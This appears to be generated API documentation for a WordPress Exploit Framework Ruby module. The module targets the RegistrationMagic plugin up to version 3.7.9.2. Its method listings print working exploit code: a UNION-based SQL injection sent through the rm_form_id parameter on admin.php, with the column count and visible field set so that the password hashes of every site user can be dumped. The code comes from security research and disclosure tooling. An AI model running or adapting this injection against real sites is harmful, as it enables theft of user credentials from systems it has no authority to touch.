Class: Wpxf::Auxiliary::RegistrationMagicHashDump
- Includes:
- WordPress::HashDump
- Defined in:
- lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
- #hashdump_custom_union_values ⇒ Object
- #hashdump_number_of_cols ⇒ Object
- #hashdump_request_params ⇒ Object
- #hashdump_visible_field_index ⇒ Object
-
#initialize ⇒ RegistrationMagicHashDump
constructor
A new instance of RegistrationMagicHashDump.
- #requires_authentication ⇒ Object
- #vulnerable_url ⇒ Object
Methods included from WordPress::HashDump
#export_path, #hashdump_prefix_fingerprint_statement, #hashdump_request_body, #hashdump_request_method, #hashdump_sql_statement, #reveals_one_row_per_request, #run, #table_prefix
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #run, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ RegistrationMagicHashDump
Returns a new instance of RegistrationMagicHashDump.
6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
# File 'lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb', line 6 def initialize super update_info( name: 'RegistrationMagic - Custom Registration Forms <= 3.7.9.2 Authenticated Hash Dump', desc: %( RegistrationMagic - Custom Registration Forms <= 3.7.9.2 suffers from an SQL injection vulnerability which is exploitable by registered users with the required privileges to manage the plugin. This module utilises the vulnerability to dump the hashed passwords of all users in the database. ), author: [ 'rastating' # Disclosure + WPXF module ], references: [ ['WPVDB', '8975'], ['URL', 'https://www.rastating.com/registrationmagic-custom-registration-forms-3-7-9-2-authenticated-sql-injection'] ], date: 'Dec 10 2017' ) end |
Instance Method Details
#check ⇒ Object
30 31 32 |
# File 'lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb', line 30 def check check_plugin_version_from_readme('custom-registration-form-builder-with-submission-manager', '3.7.9.3') end |
#hashdump_custom_union_values ⇒ Object
45 46 47 48 49 |
# File 'lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb', line 45 def hashdump_custom_union_values values = Array.new(11) values[4] = 'concat(0x54,0x65,0x78,0x74,0x62,0x6f,0x78)' values end |
#hashdump_number_of_cols ⇒ Object
55 56 57 |
# File 'lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb', line 55 def hashdump_number_of_cols 11 end |
#hashdump_request_params ⇒ Object
38 39 40 41 42 43 |
# File 'lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb', line 38 def hashdump_request_params { 'page' => 'rm_field_manage', 'rm_form_id' => "-#{Utility::Text.rand_numeric(2)} UNION #{hashdump_sql_statement}" } end |
#hashdump_visible_field_index ⇒ Object
51 52 53 |
# File 'lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb', line 51 def hashdump_visible_field_index 3 end |
#requires_authentication ⇒ Object
34 35 36 |
# File 'lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb', line 34 def requires_authentication true end |
#vulnerable_url ⇒ Object
59 60 61 |
# File 'lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb', line 59 def vulnerable_url normalize_uri(wordpress_url_admin, 'admin.php') end |